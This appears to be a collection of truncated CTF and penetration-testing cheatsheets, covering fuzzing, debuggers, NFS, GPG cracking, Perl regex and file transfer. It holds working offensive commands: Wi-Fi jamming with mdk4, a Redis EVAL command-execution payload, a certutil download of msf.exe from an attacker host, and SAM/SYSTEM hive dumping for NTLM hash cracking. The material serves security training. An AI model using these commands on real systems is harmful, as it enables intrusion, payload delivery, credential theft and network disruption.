Cheatsheets

1. Directory and File Brute Forcing Basic Directory Fuzzing: ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/ Fuzz common directory names (e.g., /admin/, /uploads/). 2. Fuzzing Parameters Basic Parameter Fuzzing: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ Replaces FUZZ with words from the wordlist to test URL parameters. Filter by Status Code: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200 Shows responses only for the 200 OK status code. Filter by Content Size: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150 Filters results based on exact response size in bytes. Fuzzing with JSON Payload (for APIs): ...

Execution control F7 runs step into so it enters the next function F8 runs step over so it goes to next instruction without entering function F9 runs continue process until breakpoint or crash Ctrl + F2 stops the debugger Ctrl + F9 restarts the process Breakpoints F2 toggles breakpoint on current line Shift + F2 deletes all breakpoints Alt + B opens breakpoint list Navigation during debug EIP RIP highlighted shows current instruction Space switches graph view and linear view G jumps to address Esc goes back Registers and memory Alt + R opens registers window Alt + M opens memory window Alt + S opens stack view Ctrl + Alt + R refreshes registers Practical CTF flow Press F9 to run program Hit F2 on main or check function Use F8 to trace logic Use F7 only when entering crypto or check routine Watch registers and stack Laptop Friendly Tip If F keys are painful then remap: ...

With the mdk4 tool, you can jam Wi-Fi networks in various ways. This guide will walk you through the installation, setup, and usage of mdk4, including examples for different attacks. 1. Installation If mdk4 is not installed on your system, install it using the following command: sudo apt-get install mdk4 -y Switching to Root User If you are not the root user, switch to root: sudo su Example: kali@gajendra:~$ sudo su 2. Checking Network Interface Status Check your network interface status to see if it’s in monitor mode: ...

Redis allows the execution of Lua scripts through the EVAL command. If Redis is misconfigured or exposed to attackers, the Lua scripting engine can be used to execute arbitrary commands, including reading files on the system. File Read via EVAL Command You can read the contents of a file (e.g., /flag.txt) using the EVAL command in the Redis interactive shell: EVAL "return io.popen('cat /flag.txt'):read('*a')" 0

This guide walks through analyzing a basic binary (e.g., crackme) using pwndbg. 1. Initial Reconnaissance Start gdb with the binary: $ gdb ./crackme List Functions To see all defined functions in the binary (useful to find main or custom functions): pwndbg> info functions Output Analysis: Look for main. Ignore standard library functions like puts@plt, __isoc99_scanf@plt, _start, etc., unless necessary. Tip: You can filtering with regex: info functions main or info functions ^my_. 2. Static Analysis (Disassembly) Once you identify interesting functions (like main), disassemble them to see the instructions. ...

To scan for rpcbind on a network and check NFS shares, use the following command: sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # Scanning port 111 for rpcbind and list NFS shares Listing Mounted Partitions on the Network To list the mounted partitions of a network system, use: showmount -e $IP # List the exported directories on the NFS server Mounting rpcbind Directories on Local Machine To mount a remote NFS directory on local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...

To see available keys in your system $ gpg --list-secret-keys If you have a backup.gpg keys with encrypted format. Then you need a key to decode it. If you found the key in some file. Then simple import that file in your syste $ gpg --import private.asc If the private.asc file is in encrypted format then they ask password to decrypt and import to our system. we can also crack private.asc key by extracting hash from it by using john ...

Method 1: Using an HTTP Server Step 1: Start an HTTP server on Linux Open a terminal on your Linux machine and run: sudo python3 -m http.server 80 Step 2: Download the file using certutil on Windows Open Command Prompt or PowerShell on your Windows machine and run: certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe" Method 2: Using Invoke-WebRequest Step 1: Start an HTTP server on Linux Same as Step 1 in Method 1. Step 2: Download the file using Invoke-WebRequest on Windows Open PowerShell on your Windows machine and run: ...

Perl provides powerful operators for manipulating strings using regular expressions. Here’s a breakdown of each operator with examples: s/// (Substitution Operator) Syntax: s/old-pattern/new-pattern/ Purpose: Replaces occurrences of old-pattern with new-pattern in a string. Example: s/John/Doe/ replaces the first instance of “John” with “Doe”. Example 1: Replace “John” with “Doe” text = "Hello John. John is a friend."; regex = s/John/Doe/; # Result: "Hello Doe. John is a friend." Example 2: Replace “white” with “black” ...

Step 1: 💾 Save Registry Hives (SAM, SECURITY, SYSTEM) Run these commands on the target Windows machine: reg.exe save hklm\sam sam reg.exe save hklm\security security reg.exe save hklm\system system These commands save the SAM, SECURITY, and SYSTEM hives as files in the current directory. 📂 Copy these files to your attacker machine for offline cracking. 🔍 Step 2: Extract Hashes from Saved Files Two popular tools to extract NTLM hashes: Using samdump2: samdump2 ./system ./sam Using Impacket’s secretsdump.py: secretsdump.py -sam sam -system system LOCAL 📄 Sample Output Explained Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450::: 👤 Username (e.g., Administrator) 🆔 User RID/Group (e.g., 500) 🔐 LM hash (usually empty/disabled) 🗝️ NT hash (this is what you crack) 🛠️ Step 3: Crack NTLM Hashes Extract NT hashes (4th field) and save in hashes.txt: ...